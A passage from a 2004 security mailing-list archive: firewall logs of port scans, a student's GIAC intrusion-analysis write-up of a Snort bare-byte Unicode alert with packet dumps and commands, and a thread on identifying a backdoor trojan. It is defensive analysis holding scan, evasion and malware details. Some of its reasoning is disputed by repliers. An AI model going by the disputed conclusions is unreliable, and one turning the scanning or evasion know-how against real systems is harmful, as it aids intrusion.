xxx.yyy.174.213:9898 SYN ******S* Jul 10 00:57:58 61.149.115.82:3338 -> xxx.yyy.174.214:9898 SYN ******S* Jul 10 00:57:58 61.149.115.82:3344 -> xxx.yyy.174.218:9898 SYN ******S* Jul 10 00:57:58 61.149.115.82:3349 -> xxx.yyy.174.217:9898 SYN ******S* Jul 10 00:57:58 61.149.115.82:3375 -> xxx.yyy.174.215:9898 SYN ******S* Jul 10 00:57:58 61.149.115.82:3395 -> xxx.yyy.174.219:9898 SYN ******S* Jul 10 00:57:58 61.149.115.82:3396 -> xxx.yyy.174.220:9898 SYN ******S* Jul 10 00:57:58 61.149.115.82:3398 -> xxx.yyy.174.222:9898 SYN ******S* Jul 10 00:57:58 61.149.115.82:3404 -> xxx.yyy.174.221:9898 SYN ******S* 12501 Jul 10 00:54:42 221.203.170.67:3213 -> xxx.yyy.154.115:5554 SYN ******S* Jul 10 00:54:43 221.203.170.67:3558 -> xxx.yyy.154.115:1023 SYN ******S* Jul 10 00:54:45 221.203.170.67:4171 -> xxx.yyy.154.115:9898 SYN ******S* Jul 10 00:54:42 221.203.170.67:3215 -> xxx.yyy.154.117:5554 SYN ******S* Jul 10 00:54:43 221.203.170.67:3563 -> xxx.yyy.154.117:1023 SYN ******S* Jul 10 00:54:45 221.203.170.67:4182 -> xxx.yyy.154.117:9898 SYN ******S* Jul 10 00:54:42 221.203.170.67:3214 -> xxx.yyy.154.119:5554 SYN ******S* Jul 10 00:54:43 221.203.170.67:3562 -> xxx.yyy.154.119:1023 SYN ******S* [...] Jul 10 00:56:07 221.203.170.67:4855 -> xxx.yyy.155.178:9898 SYN ******S* Jul 10 00:56:07 221.203.170.67:4864 -> xxx.yyy.155.182:9898 SYN ******S* Jul 10 00:56:07 221.203.170.67:4863 -> xxx.yyy.155.184:9898 SYN ******S* Jul 10 00:56:07 221.203.170.67:4866 -> xxx.yyy.155.185:9898 SYN ******S* Jul 10 00:56:07 221.203.170.67:4873 -> xxx.yyy.155.180:9898 SYN ******S* Jul 10 00:56:07 221.203.170.67:4865 -> xxx.yyy.155.179:9898 SYN ******S* Jul 10 00:56:07 221.203.170.67:4876 -> xxx.yyy.155.181:9898 SYN ******S* Jul 10 00:56:08 221.203.170.67:4887 -> xxx.yyy.155.183:9898 SYN ******S* 12437 Jul 10 00:53:37 218.244.206.132:4899 -> xxx.yyy.194.135:1023 SYN ******S* Jul 10 00:53:40 218.244.206.132:3174 -> xxx.yyy.194.135:9898 SYN ******S* Jul 10 00:53:37 218.244.206.132:4878 -> xxx.yyy.194.125:1023 SYN ******S* Jul 10 00:53:40 218.244.206.132:3171 -> xxx.yyy.194.125:9898 SYN ******S* Jul 10 00:53:37 218.244.206.132:4880 -> xxx.yyy.194.134:1023 SYN ******S* Jul 10 00:53:40 218.244.206.132:3172 -> xxx.yyy.194.134:9898 SYN ******S* Jul 10 00:53:37 218.244.206.132:4876 -> xxx.yyy.194.124:1023 SYN ******S* Jul 10 00:53:40 218.244.206.132:3169 -> xxx.yyy.194.124:9898 SYN ******S* [...] Jul 10 00:55:29 218.244.206.132:3802 -> xxx.yyy.214.238:9898 SYN ******S* Jul 10 00:55:29 218.244.206.132:3804 -> xxx.yyy.214.240:9898 SYN ******S* Jul 10 00:55:29 218.244.206.132:3803 -> xxx.yyy.214.239:9898 SYN ******S* Jul 10 00:55:29 218.244.206.132:3805 -> xxx.yyy.214.241:9898 SYN ******S* Jul 10 00:55:29 218.244.206.132:3862 -> xxx.yyy.214.242:9898 SYN ******S* Jul 10 00:55:29 218.244.206.132:3878 -> xxx.yyy.214.245:9898 SYN ******S* Jul 10 00:55:29 218.244.206.132:3866 -> xxx.yyy.214.243:9898 SYN ******S* Jul 10 00:55:29 218.244.206.132:3891 -> xxx.yyy.214.246:9898 SYN ******S* Jul 10 00:55:29 218.244.206.132:3868 -> xxx.yyy.214.244:9898 SYN ******S* 10115 Jul 10 00:56:04 218.24.91.32:3104 -> xxx.yyy.174.3:5554 SYN ******S* Jul 10 00:56:05 218.24.91.32:4577 -> xxx.yyy.174.3:1023 SYN ******S* Jul 10 00:56:07 218.24.91.32:3072 -> xxx.yyy.174.3:9898 SYN ******S* Jul 10 00:56:04 218.24.91.32:3107 -> xxx.yyy.174.4:5554 SYN ******S* Jul 10 00:56:05 218.24.91.32:4582 -> xxx.yyy.174.4:1023 SYN ******S* Jul 10 00:56:04 218.24.91.32:3103 -> xxx.yyy.174.2:5554 SYN ******S* Jul 10 00:56:05 218.24.91.32:4575 -> xxx.yyy.174.2:1023 SYN ******S* Jul 10 00:56:07 218.24.91.32:3068 -> xxx.yyy.174.2:9898 SYN ******S* [...] Jul 10 00:56:48 218.24.91.32:1403 -> xxx.yyy.194.88:9898 SYN ******S* Jul 10 00:56:48 218.24.91.32:1408 -> xxx.yyy.194.90:9898 SYN ******S* Jul 10 00:56:48 218.24.91.32:1610 -> xxx.yyy.194.107:9898 SYN ******S* Jul 10 00:56:48 218.24.91.32:1625 -> xxx.yyy.194.108:9898 SYN ******S* Jul 10 00:56:48 218.24.91.32:1641 -> xxx.yyy.194.110:9898 SYN ******S* Jul 10 00:56:48 218.24.91.32:1639 -> xxx.yyy.194.114:9898 SYN ******S* Jul 10 00:56:48 218.24.91.32:1666 -> xxx.yyy.194.112:9898 SYN ******S* Jul 10 00:56:48 218.24.91.32:1686 -> xxx.yyy.194.109:9898 SYN ******S* 10005 Jul 10 00:52:22 221.192.248.109:1249 -> xxx.yyy.153.137:1023 SYN ******S* Jul 10 00:52:25 221.192.248.109:1973 -> xxx.yyy.153.137:9898 SYN ******S* Jul 10 00:52:22 221.192.248.109:1251 -> xxx.yyy.153.140:1023 SYN ******S* Jul 10 00:52:25 221.192.248.109:1975 -> xxx.yyy.153.140:9898 SYN ******S* Jul 10 00:52:22 221.192.248.109:1253 -> xxx.yyy.153.145:1023 SYN ******S* Jul 10 00:52:25 221.192.248.109:1983 -> xxx.yyy.153.145:9898 SYN ******S* Jul 10 00:52:22 221.192.248.109:1250 -> xxx.yyy.153.139:1023 SYN ******S* Jul 10 00:52:25 221.192.248.109:1974 -> xxx.yyy.153.139:9898 SYN ******S* [...] Jul 10 00:53:53 221.192.248.109:2642 -> xxx.yyy.154.19:9898 SYN ******S* Jul 10 00:53:53 221.192.248.109:2672 -> xxx.yyy.154.2:9898 SYN ******S* Jul 10 00:53:53 221.192.248.109:2703 -> xxx.yyy.154.16:9898 SYN ******S* Jul 10 00:53:53 221.192.248.109:2753 -> xxx.yyy.154.11:9898 SYN ******S* Jul 10 00:53:54 221.192.248.109:2819 -> xxx.yyy.154.13:9898 SYN ******S* Jul 10 00:53:54 221.192.248.109:2818 -> xxx.yyy.154.10:9898 SYN ******S* Jul 10 00:53:54 221.192.248.109:2827 -> xxx.yyy.154.17:9898 SYN ******S* Jul 10 00:53:54 221.192.248.109:2828 -> xxx.yyy.154.20:9898 SYN ******S* Jul 10 00:53:54 221.192.248.109:2839 -> xxx.yyy.154.5:9898 SYN ******S* 9954 Jul 10 00:56:18 221.200.27.28:3352 -> xxx.yyy.71.161:5554 SYN ******S* Jul 10 00:56:21 221.200.27.28:1382 -> xxx.yyy.71.161:9898 SYN ******S* Jul 10 00:56:18 221.200.27.28:3350 -> xxx.yyy.71.160:5554 SYN ******S* Jul 10 00:56:21 221.200.27.28:1381 -> xxx.yyy.71.160:9898 SYN ******S* Jul 10 00:56:18 221.200.27.28:3353 -> xxx.yyy.71.162:5554 SYN ******S* Jul 10 00:56:21 221.200.27.28:1386 -> xxx.yyy.71.162:9898 SYN ******S* Jul 10 00:56:18 221.200.27.28:3354 -> xxx.yyy.71.163:5554 SYN ******S* Jul 10 00:56:21 221.200.27.28:1387 -> xxx.yyy.71.163:9898 SYN ******S* [...] Jul 10 00:57:00 221.200.27.28:4802 -> xxx.yyy.91.175:9898 SYN ******S* Jul 10 00:57:00 221.200.27.28:4901 -> xxx.yyy.91.232:9898 SYN ******S* Jul 10 00:57:00 221.200.27.28:4809 -> xxx.yyy.91.184:9898 SYN ******S* Jul 10 00:57:00 221.200.27.28:4810 -> xxx.yyy.91.185:9898 SYN ******S* Jul 10 00:57:00 221.200.27.28:4811 -> xxx.yyy.91.186:9898 SYN ******S* Jul 10 00:57:00 221.200.27.28:1054 -> xxx.yyy.91.234:9898 SYN ******S* Jul 10 00:57:00 221.200.27.28:1060 -> xxx.yyy.91.236:9898 SYN ******S* Jul 10 00:57:00 221.200.27.28:1065 -> xxx.yyy.91.240:9898 SYN ******S* 9671 Jul 10 13:17:11 213.226.134.102:2468 -> xxx.yyy.1.95:1433 SYN ******S* Jul 10 13:17:11 213.226.134.102:2469 -> xxx.yyy.1.96:1433 SYN ******S* Jul 10 13:17:14 213.226.134.102:2480 -> xxx.yyy.1.107:1433 SYN ******S* Jul 10 13:17:14 213.226.134.102:2481 -> xxx.yyy.1.108:1433 SYN ******S* Jul 10 13:17:14 213.226.134.102:2482 -> xxx.yyy.1.109:1433 SYN ******S* Jul 10 13:17:14 213.226.134.102:2483 -> xxx.yyy.1.110:1433 SYN ******S* Jul 10 13:17:14 213.226.134.102:2484 -> xxx.yyy.1.111:1433 SYN ******S* Jul 10 13:17:14 213.226.134.102:2485 -> xxx.yyy.1.112:1433 SYN ******S* [...] Jul 10 13:28:51 213.226.134.102:4738 -> xxx.yyy.255.166:1433 SYN ******S* Jul 10 13:28:51 213.226.134.102:4739 -> xxx.yyy.255.167:1433 SYN ******S* Jul 10 13:28:51 213.226.134.102:4741 -> xxx.yyy.255.169:1433 SYN ******S* Jul 10 13:28:51 213.226.134.102:4745 -> xxx.yyy.255.173:1433 SYN ******S* Jul 10 13:28:51 213.226.134.102:4752 -> xxx.yyy.255.180:1433 SYN ******S* Jul 10 13:28:51 213.226.134.102:4750 -> xxx.yyy.255.178:1433 SYN ******S* Jul 10 13:28:51 213.226.134.102:4797 -> xxx.yyy.255.185:1433 SYN ******S* Jul 10 13:28:51 213.226.134.102:1045 -> xxx.yyy.255.219:1433 SYN ******S* Jul 10 13:28:52 213.226.134.102:1080 -> xxx.yyy.255.254:1433 SYN ******S* 9473 -- - Ken =========================================================================== Ken Connelly (KC152) Systems and Operations Manager, ITS - Network Services University of Northern Iowa Cedar Falls, IA 50614-0121 email: Ken.Connelly at uni.edu phone: (319) 273-5850 fax: (319) 273-7373 From dana at dunrobin.dyn.dhs.org Sun Jul 11 13:50:34 2004 From: dana at dunrobin.dyn.dhs.org (Dana Webber) Date: Sun, 11 Jul 2004 09:50:34 -0400 Subject: [Intrusions] LOGS: GIAC GCIA Version 3.4 Practical Detect Vilaiporn Taweelappontong In-Reply-To: <20040711023050.52515.qmail@web51807.mail.yahoo.com> References: <20040711023050.52515.qmail@web51807.mail.yahoo.com> Message-ID: <200407110950.35031.dana@dunrobin.dyn.dhs.org> Corelations? > It is obvious that host 192.168.17.68 is a web server and it's IIS. This is not obvious to me. On Saturday 10 July 2004 22:30, Vilaiporn Taweelappontong wrote: > Dear all > > This is a second attempt to post the assignment. I > would really appreciate if someone could give me > comments on my analysis. > > Thank you very much in advance and regards, > Vilaiporn > > > 1. Source of trace > Source of trace was file 2003.12.15.6 downloaded from > www.incidents.org/log. > > -Statistics (from Ethereal) > File length: 3000044 > Format: libpcap > Start time: 2:07:16.936242 > End time: 2:08:17.518422 > Elapsed time between first and last packet: 60.582 > seconds > Packet count: 36672 > Snapshot length: 96 > > > I used the Statistics function of ethereal to > summarize a list of IP addresses and MAC addresses in > the file. And I looked up a vendor Ethernet MAC > address from the web site > http://www.coffer.com/mac_find/. Below is an > architecture base on my understanding: > > > 10.10.10.165 (00:03:47:8c:89:c2 Intel machine ) ---> > 3COM (00:01:02:79:91:ed) ---> Sniffer ----> Firewall > ---> 192.168.17.68 (00:50:56:40:00:6D VMWARE) > > Observation: > File date and timestamp reported are different. The > file name indicate that the data should be 2003/12/15 > but the date specified in all packets actually > indicated packets generated on 2003/11/19. I > understand that some technique was used to obfuscate > the information, such as modify ip address, as > checksum of all packets are correct. Or no obfuscation > has been done. > > 2. Detect was generated by > The file is stored in tcpdump binary format. The > detect presented in this assignment was generated by > Snort version 2.1.1, which I ran the analysis with my > Windows 2000 Server machine. I ran snort in the NIDS > mode with standard snort ruleset downloaded on 2 May > 2004. All rules files were enabled. Command that was > used: > > C:\snort\bin\snort -r 2003.12.5.6 -c > c:\snort\etc\snort.conf -l ex1 -X -d -A full > > -r 2003.12.5.6 read source file 2003.12.5.6 > -c c:\snort\etc\snort.conf run against the > configuration file snort.conf > -l ex1 log the output file (alert file and log file) > in ex1 folder > -X dump the raw packet data starting at the link layer > (in this case, this is the Ethernet header) > -d dump the application layer (dump the packet > payloads with the packet headers) > -A full display text alert with full packet headers > > The selected alert result is as follow: > > [**] (http_inspect) BARE BYTE UNICODE ENCODING [**] > 11/19-02:08:04.823979 10.10.10.165:1085 -> > 192.168.17.68:80 > TCP TTL:128 TOS:0x0 ID:42592 IpLen:20 DgmLen:41 DF > ***A**** Seq: 0xE4F18713 Ack: 0x16A6B6DB Win: 0x4470 > TcpLen: 20 > > The snort rule that trigger the ?Bare Byte Unicode > Encoding? was the http_inspect in the preprocessor > configure. [1] Preprocessors take the decoded packets > from the Snort packet decoder and can examine or > manipulate them before they are handed to the > detection engine. > > preprocessor stream4_reassemble > > preprocessor http_inspect: global \ > iis_unicode_map unicode.map 1252 > > preprocessor http_inspect_server: server default \ > profile all ports { 80 8080 8180 } \ > oversize_dir_length 500 > > Note that profile all includes the ?bare byte > decoding? enabled. The following configuration were > displayed when you run snort (without quiet option > enabled). You can see that the bare byte option was > set to YES. > > HttpInspect Config: > GLOBAL CONFIG > Max Pipeline Requests: 0 > Inspection Type: STATELESS > Detect Proxy Usage: NO > IIS Unicode Map Filename: > c:\snort\etc\unicode.map > IIS Unicode Map Codepage: 1252 > DEFAULT SERVER CONFIG: > Ports: 80 8080 8180 > Flow Depth: 300 > Max Chunk Length: 500000 > Inspect Pipeline Requests: YES > URI Discovery Strict Mode: NO > Allow Proxy Usage: NO > Disable Alerting: YES > Oversize Dir Length: 500 > Only inspect URI: NO > Ascii: YES alert: NO > Double Decoding: YES alert: YES > %U Encoding: YES alert: YES > Bare Byte: YES alert: YES > Base36: OFF > UTF 8: OFF > IIS Unicode: YES alert: YES > Multiple Slash: YES alert: NO > IIS Backslash: YES alert: NO > Directory: YES alert: NO > Apache WhiteSpace: YES alert: YES > IIS Delimiter: YES alert: YES > IIS Unicode Map: GLOBAL IIS UNICODE MAP CONFIG > Non-RFC Compliant Characters: NONE > > > > To look into the packet in details, I used windump to > generate packet in hex format: > > C:\windump>windump -r 2003.12.15.6 -x -vv -n "dst host > 192.168.17.68 and port 80" > > 02:08:04.823979 IP (tos 0x0, ttl 128, id 42592, len > 41) 10.10.10.165.1085 > 192. > 168.17.68.80: . [tcp sum ok] 3841034003:3841034004(1) > ack 380024539 win 17520 (DF) > 4500 0029 a660 4000 8006 6dd3 > 0a0a 0aa5 > c0a8 1144 043d 0050 e4f1 8713 > 16a6 b6db > 5010 4470 b6b3 0000 9000 0000 > 0000 > > > It?s obvious that host 192.168.17.68 is a web server > and it?s IIS. The data field displayed in hex above is > ?90? (NOP bytes usually used by shellcode) which seems > like someone is trying a buffer overflow on the web > server. > > Let?s also look at other packets associated with host > 192.168.17.68 for a better analysis. > > C:\Snort\log\old>snort -r 2003.12.15.6 -v -q "host > 192.168.17.68" > 11/19-02:07:48.841453 10.10.10.165:1691 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:41554 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:07:51.828714 10.10.10.165:1691 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:41720 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:07:57.968183 10.10.10.165:1691 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:42089 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:07:59.094302 10.10.10.165:1703 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:42248 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:08:02.163499 10.10.10.165:1703 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:42416 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:08:04.823979 10.10.10.165:1085 -> > 192.168.17.68:80 > TCP TTL:128 TOS:0x0 ID:42592 IpLen:20 DgmLen:41 DF > ***A**** Seq: 0xE4F18713 Ack: 0x16A6B6DB Win: 0x4470 > TcpLen: 20 > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:08:08.302980 10.10.10.165:1703 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:42605 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:08:09.095015 10.10.10.165:1711 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:42615 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x2999ACB6 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:08:12.089067 10.10.10.165:1711 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:42647 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x2999ACB6 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > Run time for packet processing was 0.750000 seconds > > The above information still not enough to analyse the > intruder?s attempt so I have merged all log files into > one with the following command. > > C:> mergecap -w merge 2003.12.15.1 2003.12.15.2 > 2003.12.15.3 2003.12.15.4 2003.12.15.5 2003.12.15.6 > 2003.12.15.7 2003.12.15.8 2003.12.15.9 2003.12.15.10 > 2003.12.15.11 2003.12.15.12 2003.12.15.13 > 2003.12.15.14 > > Then I ran snort again with the same set of rules. > Some of the results that I got were shown below: > > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:05:05.114599 10.10.10.165:2695 -> > 192.168.17.68:1 > TCP TTL:128 TOS:0x0 ID:21572 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x8158842 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:05:05.115021 10.10.10.165:2696 -> > 192.168.17.68:2 > TCP TTL:128 TOS:0x0 ID:21573 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x816111F Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:05:05.116627 10.10.10.165:2697 -> > 192.168.17.68:3 > TCP TTL:128 TOS:0x0 ID:21574 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x816B61C Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:05:05.117195 10.10.10.165:2698 -> > 192.168.17.68:4 > TCP TTL:128 TOS:0x0 ID:21575 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x817B1FC Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:05:05.117646 10.10.10.165:2699 -> > 192.168.17.68:5 > TCP TTL:128 TOS:0x0 ID:21576 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x81865D4 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > The above are just sample packets. We can tell from > the generated packets that the attacker did TCP port > scan and UDP port scan to identified the open ports of > host 192.168.17.68. Once port 80 is found running, the > attack knew that this is a web server. So the attacker > was trying to scan the server with, probably, web > server scanning tools. > > 3. Probability the source address was spoofed > HTTP session requires a complete 3-way handshake. > This packet, however, did not complete the handshake > so it is unlikely that the source ip would be spoofed. > > 4. Description of attack > [1] Bare byte encoding is an IIS trick that uses > non-ASCII chars as valid values in decoding UTF-8 > values. This is NOT in the HTTP standard, as all > non-ASCII values have to be encoded with a %. Bare > byte encoding allows the user to emulate an IIS server > and interpret non-standard encodings correctly. > There are no legitimate clients that encoded UTF-8 > this way, since it is non-standard. > > For more descriptions on the terms being used, > > Unicode is a single unified character set. Unicode > provides a unique number for every character, no > matter what the platform, no matter what the program, > no matter what the language. [5] > UTF-8 is a method to encode character to Unicode. (one > of the three common encoding method) UTF-8 encodes > each Unicode character as a variable number of 1 to 4 > octets. Using Unicode/UTF-8, you can write in emails > and source code things such as Mathematics and > Sciences or different languages. > ASCII - ASCII code is the numerical representation of > a character. Because computer can only understand > numbers. All non-ASCII characters usually screwed up > when output it to the browser, such as some special > character or language. UTF-8 supports ASCII characters > but not very good in non-ASCII character. > > A http connection to the web server will usually start > with a request method such as GET or POST. All packets > (except for the highlighted one) has started a 3 way > handshake by initiating SYN to the web server. Somehow > the highlighted packet sent the packet with ACK flag > set to the web server without the request method. This > does not follow the RFC2616 and trigger snort rule to > alert. The result from Ethereal actually display this > packet at ?Continuation? which means there is no > request in the packet. > > 5. Attack mechanism > As I analyzed the combined log, I found that host > 10.10.10.165 tried various attacks against host > 192.168.17.68 including TCP scan, UDP scan, socks scan > and probably Unicode attack. Usually I would try to > obtain the correlation evidence from the secondary > resource such as web server to confirm the attack. > However, the secondary resource is not available in > this case and we only have the snort log up to less > than 2 hours. With such limitation I would assume that > the attack using Unicode, somehow, was used as part of > the scanning process and one of the scanning policy > happen to use the non-ASCII character that trigger the > snort rule to alert. > > To confirm my understanding, I set up a web server at > home and wrote some e-commerce pages. Then I ran snort > with the same rule set and used N-Stealth, a HTTP > Security Scanner, to scan the e-commerce application > that I created. N-Stealth used various combinations of > possible web application attack and generated a lot of > alerts including bare byte Unicode encoding? alerts. > > 6. Correlations > Bare byte Unicode encoding is considered under the > Unicode attack category. The Unicode attack was > previously raised by Bruce Schneier at > http://www.schneier.com/crypto-gram-0007.html > > 7. Evidence of active targeting > The attacker was trying to scan for vulnerable host. > Host 192.168.17.68 is not the key target at first. > > 8. Severity > Severity = (criticality + lethality) (system > countermeasures + network countermeasures) > > Criticality 4: This attack targets the IIS > Server which is a widely used web server worldwide. > > Lethality 2: This attack could be part of the > scanning and DoS. If successful, it could bring down > the server. For this case, this server is not the > target at first. The attacker performed host scanning > to look for vulnerable host. The attacker may have > succeeded compromise the server. From the log, there?s > no sign of system down. > > System countermeasures 2: The problem of IIS way of > encoding the non-ASCII character cannot be resolved > solely by patching. So I give 2. > > Network countermeasures 2: Firewalls and routers > cannot prevent the Unicode attack that well. So I give > 2 for this as well. Unless a specific web application > firewall is being used, then I will give a higher > rating. > > Severity = (4 + 2) - (2 + 2) = 2 > > 9. Defensive recommendation > -Apply necessary patches to prevent known > vulnerabilities at the web server or operating system. > -Apply a secure programming concept when developing > the web application. Necessary input validation must > be in place to filter out characters that will not be > needed. For most of the case, non-ASCII character > won?t be needed for any field. > -Have network measures in place such as properly > configured router, firewalls and IDS. > > 10. Multiple choice questions > Which web server could be vulnerable to ?bare byte > Unicode encoding? attack? > A. IIS > B. Netscape > C. Apache > D. Any web server > > Answer: A > > > > > __________________________________ > Do you Yahoo!? > New and Improved Yahoo! Mail - Send 10MB messages! > http://promotions.yahoo.com/new_mail > _______________________________________________ > Intrusions mailing list > Intrusions at lists.sans.org > http://www.dshield.org/mailman/listinfo/intrusions -- Dana Webber dana at dunrobin.dyn.dhs.org http://dunrobin.dyn.dhs.org Getting a computer system to work is like banging your head against a brick wall until the wall falls down. From dana at dunrobin.dyn.dhs.org Sun Jul 11 21:53:54 2004 From: dana at dunrobin.dyn.dhs.org (Dana Webber) Date: Sun, 11 Jul 2004 17:53:54 -0400 Subject: [Intrusions] Need help to identify a trojan In-Reply-To: <40F05E75.E6B648BD@epost.de> References: <020e01c465b9$8268d500$a900a8c0@cybergeneration.com> <40F05E75.E6B648BD@epost.de> Message-ID: <200407111753.54342.dana@dunrobin.dyn.dhs.org> have you tried Adaware from www.lavasoftusa.com? it's free On Saturday 10 July 2004 17:24, Axel Pettinger wrote: > Maxime Ducharme wrote: > > Hi to the list, > > one of our customer's servers have been compromised and I'd > > need help to identify trojan used. > > [snip] > > > This file is bound to TCP port 753, and a connection on this > > port output this : > > 220 jsdaus Microsoft FTP Service (Version 5.0) > > [snip] > > > Norton says this file is not infected, > > That's correct as - strictly speaking - it isn't "infected" ... ;-) > > > but it looks really suspicious, > > Unpack the file using UPX and then have a look at it with something > like Notepad. > > > we already shut down the server for analysis. It has been used for > > scanning. > > > > Other hack tools have been found under C:\RECYCLER\speedy. > > > > I'd like to know which kind of trojan it is, and if it has > > self-propagating behavior like some Ago-Gaobot. > > I don't know that for sure but I really doubt it. > > McAfee identifies the file (MD5: ffdbe99a3e614650d93b310a34273d4e) as > "application SimpelFTP" - note that it doesn't report it as a trojan, > only as a "potentially unwanted application". This sounds certainly a > little bit strange because other av scanners identify it as a backdoor > trojan variant named "Delf" and the file itself contains the string > "Simpel IRC BOT". > > There seem to be several variants of that "Simpel" program, because the > one mentioned in the VGrep virus data base obviously cannot be the one > you found: > http://www.virusbtn.com/resources/vgrep/vgrep.cgi?terms=SimpelFTP&product=8 > > Regards, > Axel Pettinger > _______________________________________________ > Intrusions mailing list > Intrusions at lists.sans.org > http://www.dshield.org/mailman/listinfo/intrusions -- Dana Webber dana at dunrobin.dyn.dhs.org http://dunrobin.dyn.dhs.org Getting a computer system to work is like banging your head against a brick wall until the wall falls down. From Breault.SM at forces.gc.ca Sun Jul 11 22:24:12 2004 From: Breault.SM at forces.gc.ca (Breault.SM at forces.gc.ca) Date: Sun, 11 Jul 2004 18:24:12 -0400 Subject: [Intrusions] LOGS: GIAC GCIA Version 3.4 Practical Detect VilaipornTaweelappontong Message-ID: <20040711222043.10F5182585@mx01.forces.gc.ca> Hi hope this helps, >cut from your detect 3. Probability the source address was spoofed HTTP session requires a complete 3-way handshake. This packet, however, did not complete the handshake so it is unlikely that the source ip would be spoofed. Does this mean that an IP who does not complete the handshake is therefore not spoofed???? Stephen Breault Master Seaman Shift 4 Supervisor DND Computer Incident Response Team (DND CIRT) Canadian Forces Network Operations Centre T?l?phone / Phone: (613) 945-7746 CSN: 849-7746 T?l?copieur / Fax: (613) 945-6407 Courrier ?lectronique / E-Mail: DWAN: Building/Edifice: CFS Leitrim DIN: ***** Computer security incident? Call 613-945-7777 or toll free 1-877-DND-CIRT ****** ***** Incident Informatiques? Apellez 613-945-7777 ou sans frais 1-877-DND-CIRT ****** -----Original Message----- From: Vilaiporn Taweelappontong [mailto:vilaiporn_taweelappontong at yahoo.com] Sent: Sunday, July 11, 2004 2:31 AM To: intrusions at lists.sans.org Subject: [Intrusions] LOGS: GIAC GCIA Version 3.4 Practical Detect VilaipornTaweelappontong Dear all This is a second attempt to post the assignment. I would really appreciate if someone could give me comments on my 